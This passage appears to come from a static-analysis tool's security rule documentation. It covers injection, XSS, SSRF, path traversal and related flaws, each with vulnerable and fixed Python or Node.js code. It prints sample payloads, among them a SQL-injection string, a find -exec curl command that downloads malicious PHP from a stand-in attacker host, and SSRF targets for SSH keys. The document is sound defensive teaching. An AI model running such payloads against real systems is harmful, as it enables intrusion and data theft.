As a rule of thumb, the approach to protect against injection vulnerabilities is to ensure that untrusted data cannot break out of the initially intended logic.

When using DynamoDB with Boto3, the best way to do so is by using expression attributes as placeholders (:placeholder). It will end up replacing the attribute with the value defined in ExpressionAttributeValues and prevent any alteration of the original query logic. The compliant code example uses such an approach.

When possible, use the method query over scan as it disallows the OR operator on the KeyConditionExpression attribute and therefore reduces the attack surface. It also optimizes speed and costs.

This logic applies both when using the DynamoDB.Client and the DynamoDB.Table class, though the syntax differs for the latter, and the ExpressionAttributeValues would look like the following:

ExpressionAttributeValues={
    ":u": username,
    ":p": password
}

Although injection can occur on all the query or scan Expression attributes, its most severe impact occurs in the FilterExpression.

Resources

Articles & blog posts

Standards

pythonsecurity:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Python Standard Library

Code examples

The following code is vulnerable to arbitrary code execution because it runs dynamic Python code based on untrusted data.

Noncompliant code example

from flask import request

@app.route("/")
def example():
    operation = request.args.get("operation")
    eval(f"product_{operation}()") # Noncompliant
    return "OK"

Compliant solution

from flask import request

@app.route("/")
def example():
    allowed = ["add", "remove", "update"]
    operation = allowed[int(request.args.get("operationId"))]
    eval(f"product_{operation}()")

    return "OK"

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be values used in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to ensure that only the name of the untrusted parameter is passed to the dynamic code and not that its value is expanded into it. After that, the dynamic code will be able to safely access the untrusted parameter content and perform the processing.

Allow list

When the untrusted parameters are expected to contain operators, function names or other reflection-related values, best practices would encourage using an allow list. This one would contain a list of accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.

The example compliant code uses such a binding approach.
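
Such a binding can be sketched as a dictionary mapping identifiers to pre-approved handlers, which removes the need for eval() entirely; the product_* handlers are hypothetical stand-ins for real operations:

```python
# Binding identifiers to pre-approved handlers: users supply only an
# identifier, which resolves to a known-safe function or nothing at all.
def product_add():
    return "added"

def product_remove():
    return "removed"

OPERATIONS = {"0": product_add, "1": product_remove}

def dispatch(operation_id: str) -> str:
    handler = OPERATIONS.get(operation_id)
    if handler is None:
        raise ValueError("unsupported operation")
    return handler()

print(dispatch("0"))  # -> added
```

Because the untrusted value is only ever used as a dictionary key, no user-controlled text reaches a code-evaluation primitive.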

Resources

Articles & blog posts

Standards

pythonsecurity:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

A user with malicious intent carefully performs actions whose goal is to modify the existing query to change its logic to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any prerequisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in SQLAlchemy

Code examples

The following code is an example of an overly simple data retrieval function. It is vulnerable to SQL injection because user-controlled data is inserted directly into the query string: the application assumes that incoming data always has a specific range of characters and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

' OR '1'='1

Using the UNION clause, an attacker would also be able to perform queries against other tables and combine the returned data within the same query result.

Noncompliant code example

from flask import request
import sqlalchemy

@app.route('/example')
def get_users():
    user = request.args["user"]
    engine = sqlalchemy.create_engine(connection_string)
    conn = engine.connect()

    conn.execute("SELECT user FROM users WHERE user = '" + user + "'") # Noncompliant

Compliant solution

from flask import request
import sqlalchemy

@app.route('/example')
def get_users():
    user = request.args["user"]
    engine = sqlalchemy.create_engine(connection_string)
    metadata = sqlalchemy.MetaData(bind=engine, reflect=True)
    users = metadata.tables['users']
    conn = engine.connect()

    sql = users.select().where(users.c.user == user)
    conn.execute(sql)

How does this work?

Use secure APIs

Some frameworks provide a database abstraction layer that frees the developers from sanitizing or writing prepared statements.

These provided APIs can be described as "secure by design".
By providing a builder pattern with parameter binding behind the scenes, SQLAlchemy can be called "secure by design" as it adds multiple layers of security to the code while keeping the codebase shorter.

Note: These types of APIs can also provide "raw" functions or equivalents. These functions let developers write query strings directly, bypassing the builder pattern and its automatic parameter binding.
They should be considered unsafe and should not be used with untrusted data. For example, SQLAlchemy exposes sqlalchemy.text(), which is prone to injections when untrusted data is concatenated into the query string.

Resources

Articles & blog posts

Standards

pythonsecurity:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker must use phishing techniques to ensure that their target users click on the link.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the victim’s perspective. This may result in a loss of integrity and theft of the legitimate user’s data.

Identity spoofing

The forged link injects malicious code into the web application. The code enables identity spoofing thanks to cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in Django

Code examples

The following code is vulnerable to cross-site scripting because it returns an HTML response that contains user input.

If you do not intend to send HTML code to clients, the vulnerability can be fixed by specifying the type of data returned in the response. For example, you can use the JsonResponse class to return JSON messages securely.

Noncompliant code example

from django.http import HttpResponse
import json

def index(request):
    json = json.dumps({ "data": request.GET.get("input") })
    return HttpResponse(json)

Compliant solution

from django.http import JsonResponse

def index(request):
    json = { "data": request.GET.get("input") }
    return JsonResponse(json)

It is also possible to set the content-type manually with the content_type parameter when creating an HttpResponse object.

Noncompliant code example

from django.http import HttpResponse

def index(request):
    return HttpResponse(request.GET.get("input"))

Compliant solution

from django.http import HttpResponse

def index(request):
    return HttpResponse(request.GET.get("input"), content_type="text/plain")

How does this work?

If the HTTP response consists of HTML code, it is highly recommended to use a template engine like Django’s template system to generate it. The Django template engine separates the view from the business logic and automatically encodes the output of variables, drastically reducing the risk of cross-site scripting vulnerabilities.
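
The automatic output encoding performed by a template engine can be approximated with the standard library’s html.escape, which turns markup characters into inert HTML entities:

```python
import html

# An XSS payload is neutralized: <, > and & become HTML entities,
# so the browser renders them as text instead of executing a script.
payload = '<script>alert(1)</script>'
print(html.escape(payload))  # -> &lt;script&gt;alert(1)&lt;/script&gt;
```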

If you do not intend to send HTML code to clients, the vulnerability can be fixed by telling them what data they are receiving with the content-type HTTP header. This header tells the browser that the response does not contain HTML code and should not be parsed and interpreted as HTML. Thus, the response is not vulnerable to reflected cross-site scripting.

For example, setting the Content-Type HTTP header to text/plain allows user input to be reflected safely, because browsers will not try to parse and execute the response.

Pitfalls

Content-types

Be aware that there are more content types than text/html that allow JavaScript execution in a browser and are thus prone to cross-site scripting vulnerabilities.
The following content types are known to be affected:

  • application/mathml+xml
  • application/rdf+xml
  • application/vnd.wap.xhtml+xml
  • application/xhtml+xml
  • application/xml
  • image/svg+xml
  • multipart/x-mixed-replace
  • text/html
  • text/rdf
  • text/xml
  • text/xsl

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

As an example, filtering out user inputs based on a deny-list will never fully prevent an XSS vulnerability from being exploited. This practice is sometimes used by web application firewalls, but it is only a matter of time before malicious users find an exploitation payload that defeats the filters.

Another example is applications that allow users or third-party services to send HTML content to be used by the application. A common approach is trying to parse HTML and strip sensitive HTML tags. Again, this deny-list approach is vulnerable by design: maintaining a list of sensitive HTML tags, in the long run, is very difficult.

A preferred option is to use Markdown in conjunction with a parser that removes embedded HTML and restricts the use of "javascript:" URI.

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

pythonsecurity:S5496

Why is this an issue?

Server-side template injections occur in an application when the application retrieves data from a user or a third-party service and inserts it into a template, without sanitizing it first.

If an application contains a template that is vulnerable to injections, it is exposed to attacks that target the underlying rendering server.

A user with malicious intent can craft requests that alter the template's logic, resulting in unwanted behavior.

After creating the malicious request, the attacker can attack the servers affected by this vulnerability without relying on any prerequisites.

What is the potential impact?

An attacker exploiting a server-side template injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it

Code examples

Noncompliant code example

The following code is vulnerable to server-side template injection because it is inserting untrusted inputs into a string that is then processed for rendering.
This vulnerability arises because the rendering function does not validate the input, allowing attackers to potentially inject malicious Python code for execution.

from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route('/example')
def example():
    username = request.args.get('username')
    template = f"<p>Hello {username}</p>"
    return render_template_string(template) # Noncompliant

Compliant solution

from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route('/example')
def example():
    username = request.args.get('username')
    template = "<p>Hello {{ username }}</p>"
    return render_template_string(template, username=username)

How does this work?

Use template variables

The universal method to prevent template injection is to sanitize untrusted data. Manual sanitization is error-prone, so it is best to automate the process.

Here, render_template_string automatically sanitizes template variables by escaping them. This means that any untrusted data will not be able to break out of the initially intended template logic.
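
The same idea can be sketched manually with the standard library (an illustrative helper, not what the template engine calls internally): untrusted input is escaped before it is interpolated into HTML.

```python
import html

# Illustrative: escape untrusted input before interpolating it into HTML,
# mirroring what autoescaping template engines do for template variables.
def render_greeting(username: str) -> str:
    return f"<p>Hello {html.escape(username)}</p>"
```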

Resources

Articles & blog posts

Standards

pythonsecurity:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response in the application is not a barrier to exploitation, so blind SSRF must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on a different system it can reach. Depending on what is reachable, remote command execution may be achievable, although it often requires chaining with further exploits.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internally accessible ports on the affected server, or on others the server can communicate with, by iterating over the port field in the URL http://127.0.0.1:{port}.
Taking advantage of other supported URL schemes (dependent on the affected system), for example gopher://127.0.0.1:3306, an attacker would be able to connect to a database service and perform queries on it.

How to fix it in Python Standard Library

Code examples

The following code is vulnerable to SSRF as it opens a URL defined by untrusted data.

Noncompliant code example

from flask import request
from urllib.request import urlopen

@app.route('/example')
def example():
    url = request.args["url"]
    urlopen(url).read() # Noncompliant

Compliant solution

from flask import request
from urllib.parse import urlparse
from urllib.request import urlopen

SCHEMES_ALLOWLIST = ['https']
DOMAINS_ALLOWLIST = ['trusted1.example.com', 'trusted2.example.com']

@app.route('/example')
def example():
    url = request.args["url"]
    parsed = urlparse(url)
    if parsed.hostname in DOMAINS_ALLOWLIST and parsed.scheme in SCHEMES_ALLOWLIST:
        urlopen(url).read()

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.commit.malicious.io.
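
A stricter check compares the parsed scheme and hostname exactly instead of using a prefix test (a sketch; the domain and helper name are illustrative):

```python
from urllib.parse import urlparse

def is_allowed(url: str) -> bool:
    # Exact comparison of scheme and hostname rejects look-alike hosts
    # such as "example.commit.malicious.io" that defeat startsWith checks.
    parts = urlparse(url)
    return parts.scheme == "https" and parts.hostname == "example.com"
```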

Resources

Standards

pythonsecurity:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initial intended path. The resulting path would resolve somewhere in the filesystem to which the user should not normally have access.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permissions of the process that runs the application. In the worst-case scenario, the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in Flask

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to read arbitrary files.

Noncompliant code example

from flask import Flask, request, send_file

app = Flask('example')

@app.route('/example')
def example():
    my_file = request.args['my_file']
    return send_file("static/%s" % my_file, as_attachment=True) # Noncompliant

Compliant solution

from flask import Flask, request, send_from_directory

app = Flask('example')

@app.route('/example')
def example():
    my_file = request.args['my_file']
    return send_from_directory('static', my_file)

How does this work?

The universal method to prevent path injection is to validate paths created from untrusted data. This can be done either manually or automatically, depending on whether the library includes a data sanitization feature and the required function.

Here, send_from_directory can be considered a secure-by-design API.

Use secure-by-design APIs

Some libraries contain APIs with these three capabilities:

  • File retrieval in a file system.
  • Restriction of the file retrieval to a specific folder (thus sanitizing and validating untrusted data).
  • A feature, such as a file download or file deletion.

They can be referred to as "secure-by-design" APIs. Using this type of API, such as 'send_from_directory', brings multiple layers of security to the code while keeping the code base shorter.

Behind the scenes, this function protects against both regular and partial path injection.

Pitfalls

Do not use os.path.join as a validator

The official documentation states that if a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.

This means that including untrusted data in any of the parameters and using the resulting string for file operations may lead to a path traversal vulnerability.

If you want to learn more about this pitfall, read our blog post about it.
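
The pitfall, and a containment check to use instead, can be sketched as follows (the paths and helper name are illustrative):

```python
import os.path

def resolve_inside(base: str, user_path: str) -> str:
    # os.path.join discards "base" entirely if user_path is absolute,
    # so the joined path must be resolved and re-checked for containment.
    candidate = os.path.realpath(os.path.join(base, user_path))
    base_real = os.path.realpath(base)
    if os.path.commonpath([candidate, base_real]) != base_real:
        raise ValueError("path escapes the base directory")
    return candidate
```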

Resources

Standards

pythonsecurity:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Thus, controlling these cookies enables control over users' identities within the application.

The injection might occur via a GET parameter, with the payload (for example, https://example.com?cookie=injectedcookie) delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim introduces sensitive data within the attacker's application session, which the attacker can later retrieve. The implications vary depending on the type of data disclosed: leaking strictly confidential user data and leaking organizational data have different impacts.

Vulnerability chaining

An attacker not only manipulates a user into browsing an application using a session cookie of their control but also successfully detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker’s session and is affected by the XSS, which can then be used for a wide range of attacks including credential stealing using mirrored login pages.

How to fix it in Django

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

from django.shortcuts import render

def check_cookie(request):
    response = render(request, "welcome.html")

    if "sessionid" not in request.COOKIES:
        cookie = request.GET.get("cookie")
        response.set_cookie("sessionid", cookie)  # Noncompliant

    return response

Compliant solution

from django.http import HttpResponseRedirect
from django.shortcuts import render

def check_cookie(request):
    response = render(request, "welcome.html")

    if "sessionid" not in request.COOKIES:
        return HttpResponseRedirect("/getcookie")

    return response

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.

Resources

Standards

pythonsecurity:S6350

Constructing arguments of system commands from user input is security-sensitive and has led to vulnerabilities in the past.

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).
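
For example, type-casting the user value to an integer can be sketched like this (the paths and helper name are illustrative):

```python
# Illustrative: casting the user value to an integer guarantees it cannot
# smuggle extra flags such as "-delete" or "-exec" into the argument list.
def find_command(raw_depth: str) -> list:
    depth = int(raw_depth)  # raises ValueError for non-numeric input
    return ["/usr/bin/find", "/tmp/images", "-maxdepth", str(depth)]
```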

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

import subprocess
user_input = request.get('input')
subprocess.run(["/usr/bin/find", user_input]) # Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

import subprocess
user_input = request.get('input')
if user_input in allowed:
    subprocess.run(["/usr/bin/find", user_input])

See

pythonsecurity:S2091

Why is this an issue?

XPath injections occur in an application when the application retrieves untrusted data and inserts it into an XML Path (XPath) query without sanitizing it first.

What is the potential impact?

In the context of a web application vulnerable to XPath injection, attackers who discover the injection point can insert data into the vulnerable field to execute malicious commands in the affected XML documents.

The impact of this vulnerability depends on how important XML structures are to the enterprise.
Where an organization relies on XML structures for business-critical operations, an attack can be critical; where XML is used only for innocuous data transport, it can be nearly harmless.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data Leaks

A malicious XPath query allows direct data leakage from one or more databases. Although XML is not as widely used as it once was, this possibility still exists with configuration files, for example.

Data deletion and denial of service

The malicious query allows the attacker to delete data in the affected XML documents.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) and if XML structures are considered important, as missing critical data can disrupt the regular operations of an organization.

How to fix it in lxml

Code examples

The following noncompliant code is vulnerable to XPath injection because untrusted data is concatenated to an XPath query without prior validation.

Noncompliant code example

from flask import request
from lxml import etree

@app.route('/authenticate')
def authenticate():
    username = request.args['username']
    password = request.args['password']
    expression = "./users/user[@name='" + username + "' and @pass='" + password + "']"
    tree = etree.parse('resources/users.xml')

    if tree.find(expression) is None:
        return "Invalid credentials", 401
    else:
        return "Success", 200

Compliant solution

from flask import request
from lxml import etree

@app.route('/authenticate')
def authenticate():
    username = request.args['username']
    password = request.args['password']
    expression = "./users/user[@name=$username and @pass=$password]"
    tree = etree.parse('resources/users.xml')

    if not tree.xpath(expression, username=username, password=password):
        return "Invalid credentials", 401
    else:
        return "Success", 200

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

Parameterized Queries

For XPath injections, the cleanest way to do so is to use parameterized queries.

XPath allows for the usage of variables inside expressions in the form of $variable. XPath variables can be used to construct an XPath query without needing to concatenate user arguments to the query at runtime. Here is an example of an XPath query with variables:

/users/user[@user=$user and @pass=$pass]

When the XPath query is executed, the user input is passed alongside it. During execution, when the values of the variables need to be known, a resolver will return the correct user input for each variable. The contents of the variables are not considered application logic by the XPath executor, and thus injection is not possible.

In the example, the username and password are passed as XPath variables rather than concatenated to the XPath query. By using a parameterized query, injection is successfully prevented.

Resources

Standards

tssecurity:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression engines use backtracking to try all possible execution paths of the regex when evaluating an input. Sometimes this can lead to performance problems, also referred to as catastrophic backtracking.

What is the potential impact?

In the context of a web application vulnerable to regex injection, attackers who discover the injection point can insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators. Replication systems would detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Node.js

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service (ReDoS) because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

const express = require('express');

const app = express();

app.get('/lookup', (req, res) => {
  const regex = RegExp(req.query.regex); // Noncompliant

  if (regex.test(req.query.data)) {
    res.send("It's a Match!");
  } else {
    res.send("Not a Match!");
  }
});

Compliant solution

const express = require('express');
const escapeStringRegexp = require('escape-string-regexp');

const app = express();

app.get('/lookup', (req, res) => {
  const regex = RegExp(escapeStringRegexp(req.query.regex));

  if (regex.test(req.query.data)) {
    res.send("It's a Match!");
  } else {
    res.send("Not a Match!");
  }
});

How does this work?

Sanitization and Validation

Escaping metacharacters with native functions is one defense against regex injection.
The escape function sanitizes the input so that the regular expression engine interprets these characters literally.
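
In Python, the standard library offers the same idea via re.escape (an illustrative helper; the compliant solution above uses escape-string-regexp in Node.js):

```python
import re

# Illustrative: re.escape neutralizes metacharacters so the untrusted
# pattern can only match itself literally, never act as a regex.
def safe_search(user_pattern: str, data: str):
    return re.search(re.escape(user_pattern), data)
```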

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.

Important note: the application must sanitize and validate on the server side, not only in the client-side front end.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the compliant solution, the escapeStringRegexp function provided by the npm package escape-string-regexp escapes metacharacters and escape sequences that could have broken the initially intended logic.

Resources

Articles & blog posts

Standards

tssecurity:S5883

Why is this an issue?

OS command argument injections occur when applications allow the execution of operating system commands from untrusted data, but the untrusted data is limited to the arguments.
It is not possible to directly inject arbitrary commands that compromise the underlying operating system, but the behavior of the executed command might still be influenced in a way that expands access, for example, to the execution of arbitrary commands. The security of the application therefore depends on the behavior of the executed program.

What is the potential impact?

An attacker exploiting an argument injection vulnerability will be able to add arbitrary arguments to a system binary call. Depending on the command the arguments are added to, this might lead to arbitrary command execution.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Express.js

Code examples

The following code uses the find command and expects the user to enter the name of a file to find on the system.

It is vulnerable to argument injection because untrusted data is inserted in the arguments of a process call without prior validation or sanitization.
Here, the application ignores that a user-submitted parameter might contain special characters that will tamper with the expected system command behavior.

In this particular case, an attacker might add arbitrary arguments to the find command for malicious purposes. For example, the following payload will download malicious software on the application’s hosting server.

 -exec curl -o /var/www/html/ http://evil.example.org/malicious.php ;

Noncompliant code example

const execa = require('execa');

async function handler(req, res) {
    await execa.command('find /tmp/images/' + req.query.file); // Noncompliant
}

Compliant solution

const execa = require('execa');

async function handler(req, res) {
    if (req.query.file && req.query.file.match(/^[A-Z]+$/i)) {
        await execa('find', ['/tmp/images/' + req.query.file]);
    } else {
        await execa('find', ['/tmp/images/']);
    }
}

How does this work?

Allowing users to insert data in operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our suggestion is to avoid using OS commands in the first place.

When this is not possible, strict measures should be applied to ensure a secure implementation.

The proposed compliant solution uses the execa method, which separates the command to run from the arguments passed to it and ensures that all arguments passed to the executed command are properly escaped. That way, an attacker with control over a command parameter cannot inject arbitrary new ones.

While this reduces the chances for an attacker to identify an exploitation payload, the highest security level will only be reached by adding an additional validation layer.

In the current example, an attacker with control over the first parameter of the find command could still be able to inject special file path characters in it. Indeed, passing ../../ string as a parameter would force the find command to crawl the whole file system. This could lead to a denial of service or sensitive data exposure.

Here, adding a regular-expression-based validation on the user-controlled value prevents this kind of issue. It ensures that the user-submitted parameter contains a harmless value.

Resources

Documentation

Standards

tssecurity:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user into browsing a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, to redirect the victim to their malicious domain.

Tricking users into sending the malicious HTTP request is usually the main task of exploiting an open redirection. It often requires the attacker to build a credible pretext to avoid arousing the victim's suspicion.

